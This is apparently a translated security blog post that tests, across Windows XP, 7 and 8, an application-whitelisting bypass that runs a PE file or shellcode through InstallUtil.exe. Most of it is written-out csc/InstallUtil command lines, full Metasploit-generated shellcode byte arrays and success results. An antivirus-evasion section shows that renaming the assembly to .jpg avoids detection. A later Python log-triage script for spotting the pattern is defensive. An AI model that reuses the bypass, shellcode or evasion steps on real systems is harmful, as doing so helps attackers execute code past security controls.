More tests on bypassing application whitelisting with InstallUtil
0x00 Preface
In this blog post, subTee not only introduces how to use installutil.exe to execute a PE file directly, but also introduces another method: executing shellcode with InstallUtil. From the code shared by subTee, the test environment was 64-bit with .NET 4.0. The article published on 360 Security Broadcast also holds that the execution environment must be .NET 4.0 or above, which would make the technique narrowly applicable. But I don't think so.
Next, we draw a new conclusion from actual tests.
0x01 Test objective: determine the environments in which the two ways of using InstallUtil actually work
0x02 test environment
xp x86
win7 x86
win7 x64
win8 x86
win8 x64
0x03 Test methods
1. Use installutil.exe to execute a PE file
Run the following commands:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
Note: see the previous article for a detailed introduction to this method.
2. Use installutil.exe to directly execute shellcode
Download link: https://gist.github.com/subTee/a06d4ae23e2517566c52
Save the downloaded file as Shellcode.cs and run the commands given in its description:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
0x04 Actual tests
Note: the commands above need to be adjusted according to the operating system version (Framework vs. Framework64 directory and .NET version).
1. xp x86
.NET is not installed by default, so this system is not tested for the moment, but it still serves as a reference for the final conclusion.
2. win7 x86
Default .NET environment: 3.5
(1) Use installutil.exe to execute a PE file
.NET 3.5 fails to compile PELoader.cs.
(2) Use installutil.exe to execute shellcode directly
Generate 32-bit shellcode with msf:
use windows/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp
byte[] buf = new byte[195] {0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };
Replace byte[] Shellcode in Shellcode.cs with this array.
Run the following commands:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Shellcode is successfully executed. A calculator is displayed.
360 successfully detects and removes it.
3. win7 x64
Default .NET environment: 3.5
(1) Use installutil.exe to execute a PE file
.NET 3.5 fails to compile PELoader.cs.
(2) Use installutil.exe to execute shellcode directly
Use msf to generate 64-bit shellcode:
use windows/x64/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp
byte[] buf = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
Replace byte[] Shellcode in Shellcode.cs with this array.
Use csc.exe and installutil.exe from .NET 2.0 x64 to run the commands:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Shellcode is successfully executed. A calculator is displayed.
If csc.exe and installutil.exe from .NET 2.0 x86 are used instead:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
An error is reported (a 64-bit assembly cannot be loaded by the 32-bit InstallUtil).
Detection test of exeshellx64.exe: 360 performs well.
4. win8 x86
The default .NET environment is 4.0.
(1) Use installutil.exe to execute a PE file
Run the following commands:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
An exception occurs during execution on the 32-bit system.
(2) Use installutil.exe to execute shellcode directly
Run the following commands:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Shellcode is successfully executed. A calculator is displayed.
Detection test of win8x86exeshell.exe: 360 again performs well.
5. win8 x64
The default .NET environment is 4.0.
(1) Use installutil.exe to execute a PE file
.NET 4.0 executes it successfully.
(2) Use installutil.exe to execute shellcode directly
Use csc.exe and installutil.exe from .NET 4.0 x64 to run the commands:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Error.
Use csc.exe and installutil.exe from .NET 4.0 x86 to run the commands:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Error.
To reach a sound conclusion, install .NET Framework 2.0 x64 on the win8 x64 system.
Use its csc.exe and installutil.exe to run the commands:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Shellcode is successfully executed. A calculator is displayed.
0x05 Supplement
In the tests above, the .NET environment shipped with the operating system is not absolute: when an application that depends on a particular .NET version is installed, that version is installed along with it, so a target may have more runtimes available than the defaults listed here.
0x06 Test conclusion
(1) Use installutil.exe to execute a PE file
Applicable to 64-bit systems with Microsoft .NET Framework 4.0.
(2) Use installutil.exe to execute shellcode directly
Applicable to .NET Framework 2.0 and the specific environments listed above.
0x07 AV evasion
Only one simple and effective method is given here.
Following the previous article, run the commands as follows:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.jpg Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.jpg
Changing the file extension evades static detection and removal. As for active defense, the whole process still does not trigger it.
When opened normally, the file shows as a damaged image.
Detection test
But in fact, it can still be executed in this way.
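From the defender's side, the test matrix above reduces to one command-line shape (InstallUtil.exe with /logfile= /LogToConsole=false /U and an assembly argument, preceded by a csc.exe /unsafe compile) and, in 0x07, an assembly whose extension is not .exe or .dll. The following is an added example, not code from the original post or from subTee: it triages constructed process-creation log lines (a simplified "Key: value|Key: value" shape, an assumption standing in for Sysmon Event ID 1 or 4688 fields) for that pattern, and checks whether a file handed to InstallUtil carries an MZ/PE header despite its extension. Rule names, severities and the sample events are all made up for the example.

```python
"""Triage of InstallUtil.exe / csc.exe invocations in process-creation logs.

Added example (not from the original post). The log format, rule names and
sample events below are constructed assumptions for illustration.
"""
from __future__ import annotations

import re
import struct
from dataclasses import dataclass

# Extensions a legitimate InstallUtil target or csc output should carry.
PE_EXTENSIONS = {".exe", ".dll"}


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extension(path: str) -> str:
    name = basename(path)
    return name[name.rfind("."):] if "." in name else ""


def parse_event(line: str) -> dict[str, str]:
    """Parse a constructed 'Key: value|Key: value' process-creation line."""
    fields: dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition(":")  # first colon only; paths keep their 'C:'
        fields[key.strip()] = value.strip()
    return fields


def analyse_event(line: str) -> list[Finding]:
    """Return findings for one process-creation event (empty list if benign)."""
    ev = parse_event(line)
    image = basename(ev.get("Image", ""))
    tokens = split_cmdline(ev.get("CommandLine", ""))
    args = tokens[1:]
    findings: list[Finding] = []
    if image == "installutil.exe":
        switches = {t.lower().split("=")[0] for t in args if t.startswith(("/", "-"))}
        targets = [t for t in args if not t.startswith(("/", "-"))]
        if switches & {"/u", "-u", "/uninstall"}:
            # Uninstall path runs the assembly's Uninstall() without install side effects.
            findings.append(Finding("installutil_uninstall", "medium", "/U uninstall invocation"))
        if {"/logfile", "/logtoconsole"} <= switches:
            # Exact argument shape used throughout the tests above.
            findings.append(Finding("installutil_poc_args", "high", "/logfile= /LogToConsole=false"))
        for target in targets:
            if extension(target) not in PE_EXTENSIONS:
                # 0x07: the assembly was renamed to a non-PE extension such as .jpg.
                findings.append(Finding("installutil_nonpe_extension", "high", target))
    elif image == "csc.exe":
        if any(t.lower() == "/unsafe" for t in args):
            findings.append(Finding("csc_unsafe_compile", "low", "/unsafe"))
        for t in args:
            if t.lower().startswith("/out:") and extension(t[5:]) not in PE_EXTENSIONS:
                findings.append(Finding("csc_nonpe_output", "high", t[5:]))
    return findings


def looks_like_pe(data: bytes) -> bool:
    """True when the bytes start with an MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def check_extension_mismatch(path: str, data: bytes) -> bool:
    """True when a file with a non-PE extension actually contains a PE header."""
    return extension(path) not in PE_EXTENSIONS and looks_like_pe(data)


def build_fake_pe_header() -> bytes:
    """Constructed minimal MZ/PE header stub for testing (not a runnable binary)."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)      # e_lfanew -> offset 0x40
    return bytes(hdr) + b"PE\0\0" + b"\0" * 20


# Constructed sample events (assumed field layout, not real telemetry).
SAMPLE_EVENTS = [
    r"Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe|CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe|ParentImage: C:\Windows\System32\cmd.exe",
    r"Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe|CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.jpg|ParentImage: C:\Windows\System32\cmd.exe",
    r"Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe|CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:exeshell.jpg Shellcode.cs|ParentImage: C:\Windows\System32\cmd.exe",
    r'Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe|CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Program Files\Vendor\Service.exe"|ParentImage: C:\Windows\System32\msiexec.exe',
]


def triage(lines: list[str]) -> list[list[str]]:
    """Rule names fired per event, in event order."""
    return [[f.rule for f in analyse_event(line)] for line in lines]


if __name__ == "__main__":
    for line, rules in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(basename(parse_event(line)["Image"]), "->", rules or "no findings")
    print("exeshell.jpg is a PE:", check_extension_mismatch("exeshell.jpg", build_fake_pe_header()))
```

The fourth sample event (a vendor installer running InstallUtil without /U against a .exe) produces no findings, which is the baseline to tune against: the /U plus /logfile= /LogToConsole=false combination is what separates the tested pattern from routine service installation, and the extension rule catches the 0x07 rename even when the command-line switches are varied. `check_extension_mismatch` is the file-side counterpart for an EDR or IR script: a ".jpg" that starts with an MZ stub and a valid PE signature is a renamed assembly regardless of what the icon shows.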
0x08 Summary
There are still many ways to use this technique, and the most important thing is the idea.
Other methods, such as PowerShell, Exploit/Migrate, WMI Providers, and COM proxy, are worth studying for breaking through whitelist restrictions.